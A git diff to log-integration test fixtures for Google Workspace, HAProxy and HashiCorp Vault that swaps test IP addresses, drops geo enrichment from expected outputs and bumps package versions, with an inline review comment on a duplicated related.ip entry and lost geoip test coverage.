+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"recovery_info_change","name":"recovery_secret_qa_edit"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_enroll"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"user_accounts","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"titanium_change","name":"titanium_unenroll"}}
diff --git a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json
index ff14c0f518f..abfbeea015e 100644
--- a/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json
+++ b/packages/google_workspace/data_stream/user_accounts/_dev/test/pipeline/test-user-accounts.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -29,35 +29,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912659600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}",
+ "ingested": "2021-12-09T13:39:18.537558Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_disable\"}}",
 "provider": "user_accounts",
 "action": "2sv_disable",
 "id": "1",
@@ -88,7 +70,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -107,35 +89,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912663400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}",
+ "ingested": "2021-12-09T13:39:18.537562500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"2sv_change\",\"name\":\"2sv_enroll\"}}",
 "provider": "user_accounts",
 "action": "2sv_enroll",
 "id": "1",
@@ -166,7 +130,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -185,35 +149,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912664600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}",
+ "ingested": "2021-12-09T13:39:18.537568300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"password_change\",\"name\":\"password_edit\"}}",
 "provider": "user_accounts",
 "action": "password_edit",
 "id": "1",
@@ -244,7 +190,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -263,35 +209,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912665600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}",
+ "ingested": "2021-12-09T13:39:18.537572800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_email_edit\"}}",
 "provider": "user_accounts",
 "action": "recovery_email_edit",
 "id": "1",
@@ -322,7 +250,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -341,35 +269,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912666500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}",
+ "ingested": "2021-12-09T13:39:18.537577900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}",
 "provider": "user_accounts",
 "action": "recovery_phone_edit",
 "id": "1",
@@ -400,7 +310,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -419,35 +329,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912667500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}",
+ "ingested": "2021-12-09T13:39:18.537583700Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}",
 "provider": "user_accounts",
 "action": "recovery_secret_qa_edit",
 "id": "1",
@@ -478,7 +370,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -497,35 +389,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912668600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}",
+ "ingested": "2021-12-09T13:39:18.537589400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}",
 "provider": "user_accounts",
 "action": "titanium_enroll",
 "id": "1",
@@ -556,7 +430,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -575,35 +449,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:30.912669600Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}",
+ "ingested": "2021-12-09T13:39:18.537595200Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}",
 "provider": "user_accounts",
 "action": "titanium_unenroll",
 "id": "1",
diff --git a/packages/google_workspace/manifest.yml b/packages/google_workspace/manifest.yml
index 73f5a19ff7b..6491dcaab1b 100644
--- a/packages/google_workspace/manifest.yml
+++ b/packages/google_workspace/manifest.yml
@@ -1,6 +1,6 @@
 name: google_workspace
 title: Google Workspace Audit Reports
-version: 1.2.0
+version: 1.2.1
 release: ga
 description: Collect audit reports from Google Workspaces with Elastic Agent.
 type: integration
diff --git a/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log b/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log
index ad3550d19c9..bbf39a3ea6b 100644
--- a/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log
+++ b/packages/haproxy/_dev/deploy/docker/sample_logs/haproxy.log
@@ -1 +1 @@
-Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
+Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
diff --git a/packages/haproxy/changelog.yml b/packages/haproxy/changelog.yml
index be2e70f4e70..7d6139fa5f7 100644
--- a/packages/haproxy/changelog.yml
+++ b/packages/haproxy/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.0.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.0.0"
 changes:
 - description: Release HAProxy as GA
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log
index 7931d2387e2..295abdc03f5 100644
--- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log
+++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log
@@ -1 +1 @@
-Sep 20 15:42:59 1.2.3.4 haproxy[24551]: Connect from 1.2.3.4:40780 to 1.2.3.4:5000 (main/HTTP)
+Sep 20 15:42:59 67.43.156.13 haproxy[24551]: Connect from 67.43.156.13:40780 to 67.43.156.13:5000 (main/HTTP)
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json
index 73e9e269503..196da4600dc 100644
--- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json
+++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json
@@ -11,39 +11,27 @@
 },
 "related": {
 "ip": [
- "1.2.3.4",
- "1.2.3.4"
+ "67.43.156.13",
+ "67.43.156.13"
 ]
 },
 "haproxy": {
 "mode": "HTTP",
 "frontend_name": "main",
- "source": "1.2.3.4"
+ "source": "67.43.156.13"
 },
 "destination": {
 "port": 5000,
- "ip": "1.2.3.4"
+ "ip": "67.43.156.13"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "RU-MOW",
- "city_name": "Moscow",
- "country_iso_code": "RU",
- "country_name": "Russia",
- "region_name": "Moscow",
- "location": {
- "lon": 37.6172,
- "lat": 55.7527
- }
- },
- "address": "1.2.3.4",
 "port": 40780,
- "ip": "1.2.3.4"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T11:10:20.374319400Z",
- "original": "Sep 20 15:42:59 1.2.3.4 haproxy[24551]: Connect from 1.2.3.4:40780 to 1.2.3.4:5000 (main/HTTP)",
+ "ingested": "2021-12-09T13:39:28.354415600Z",
+ "original": "Sep 20 15:42:59 67.43.156.13 haproxy[24551]: Connect from 67.43.156.13:40780 to 67.43.156.13:5000 (main/HTTP)",
 "category": [
 "web",
 "network"
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log
index e65e83b08e6..f92fb6760f0 100644
--- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log
+++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log
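Review bot: `related.ip` in the regenerated output still lists the same address twice (`"67.43.156.13", "67.43.156.13"`), and this fixture now locks that in; ECS treats related.ip as a set of distinct addresses, so the pipeline's append steps for source and destination presumably lack `allow_duplicates: false` and the expectation should be a single entry. Separately, the `source.geo` block is deleted rather than updated for the new address (the -7,21 hunk of test-haproxy.log-expected.json does the same), so geoip enrichment is no longer exercised by this test; if the new address is in the GeoIP test database the regenerated output should carry a geo block for it. The move of `address` below `port` inside `source` is only regeneration order and is harmless.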
@@ -1,2 +1,2 @@
-Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
+Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} "GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1"
 May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 "OPTIONS /api/v2/app/ HTTP/1.1"
\ No newline at end of file
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json
index b907607aede..a31e3387c80 100644
--- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json
+++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json
@@ -7,21 +7,9 @@
 },
 "temp": {},
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "RU-MOW",
- "city_name": "Moscow",
- "country_iso_code": "RU",
- "country_name": "Russia",
- "region_name": "Moscow",
- "location": {
- "lon": 37.6172,
- "lat": 55.7527
- }
- },
- "address": "1.2.3.4",
 "port": 38862,
- "ip": "1.2.3.4"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "url": {
 "path": "/component---src-pages-index-js-4b15624544f97cf0bb8f.js",
@@ -37,7 +25,7 @@
 },
 "related": {
 "ip": [
- "1.2.3.4"
+ "67.43.156.13"
 ]
 },
 "haproxy": {
@@ -85,8 +73,8 @@
 },
 "event": {
 "duration": 2000000,
- "ingested": "2021-06-09T11:10:20.562222600Z",
- "original": "Jul 30 09:03:52 localhost haproxy[32450]: 1.2.3.4:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} \"GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1\"",
+ "ingested": "2021-12-09T13:39:28.437354700Z",
+ "original": "Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} \"GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1\"",
 "category": [
 "web"
 ],
@@ -158,7 +146,7 @@
 },
 "event": {
 "duration": 18000000,
- "ingested": "2021-06-09T11:10:20.562273Z",
+ "ingested": "2021-12-09T13:39:28.437363200Z",
 "original": "May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 \"OPTIONS /api/v2/app/ HTTP/1.1\"",
 "category": [
 "web"
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json
index 1701464baaa..45cd17e2ffa 100644
--- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json
+++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json
@@ -68,7 +68,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:10:20.625764100Z",
+ "ingested": "2021-12-09T13:39:28.671159700Z",
 "original": "Dec 10 12:01:46 voyager haproxy[19312]: 127.0.0.1:35982 [10/Dec/2018:12:01:46.395] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 \"GET / HTTP/1.1\"",
 "category": [
 "web"
@@ -145,7 +145,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:10:20.625812300Z",
+ "ingested": "2021-12-09T13:39:28.671164Z",
 "original": "Dec 10 15:46:49 voyager haproxy[29785]: 127.0.0.1:43738 [10/Dec/2018:15:46:49.497] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} \"GET /foo HTTP/1.1\"",
 "category": [
 "web"
@@ -226,7 +226,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-06-09T11:10:20.625821Z",
+ "ingested": "2021-12-09T13:39:28.671167600Z",
 "original": "Dec 10 15:48:56 voyager haproxy[7873]: 127.0.0.1:44542 [10/Dec/2018:15:48:56.017] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} {|} \"GET /foo HTTP/1.1\"",
 "category": [
 "web"
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json
index 9562f5ca0af..9804f966f39 100644
--- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json
+++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json
@@ -41,7 +41,7 @@
 },
 "event": {
 "duration": 1000000,
- "ingested": "2021-06-09T11:10:20.709375400Z",
+ "ingested": "2021-12-09T13:39:29.001644200Z",
 "original": "Sep 20 15:44:23 127.0.0.1 haproxy[25457]: 127.0.0.1:40962 [20/Sep/2018:15:44:23.285] main app/\u003cNOSRV\u003e -1/-1/1 212 SC 1/1/0/0/0 0/0",
 "kind": "event"
 },
diff --git a/packages/haproxy/manifest.yml b/packages/haproxy/manifest.yml
index ff078988b51..8fba23061e5 100644
--- a/packages/haproxy/manifest.yml
+++ b/packages/haproxy/manifest.yml
@@ -1,6 +1,6 @@
 name: haproxy
 title: HAProxy
-version: 1.0.0
+version: 1.0.1
 description: Collect logs and metrics from HAProxy servers with Elastic Agent.
 type: integration
 icons:
diff --git a/packages/hashicorp_vault/changelog.yml b/packages/hashicorp_vault/changelog.yml
index e9824ce8b02..1c02934b57b 100644
--- a/packages/hashicorp_vault/changelog.yml
+++ b/packages/hashicorp_vault/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.2.1"
+ changes:
+ - description: Change test public IPs to the supported subset
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2327
 - version: "1.2.0"
 changes:
 - description: Add 8.0.0 version constraint
diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log
index 0d37f9fb2b0..1c765ee7c83 100644
--- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log
+++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log
@@ -1,5 +1,5 @@
-{"time":"2020-12-01T20:29:04.356625452Z","type":"request","auth":{"client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","display_name":"oidc-12349999999999999999","policies":["default","group-admin"],"token_policies":["default","group-admin"],"metadata":{"account_id":"12349999999999999999","email":"example@gmail.com","role":"gmail"},"entity_id":"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046","token_type":"service","token_ttl":3600,"token_issue_time":"2020-12-01T20:28:40Z"},"request":{"id":"cd09708b-11cc-2985-648b-cfe262cf7e50","operation":"update","mount_type":"system","client_token":"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327","client_token_accessor":"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931","namespace":{"id":"root"},"path":"sys/capabilities-self","data":{"paths":["hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27"]},"remote_address":"156.33.241.5"}}
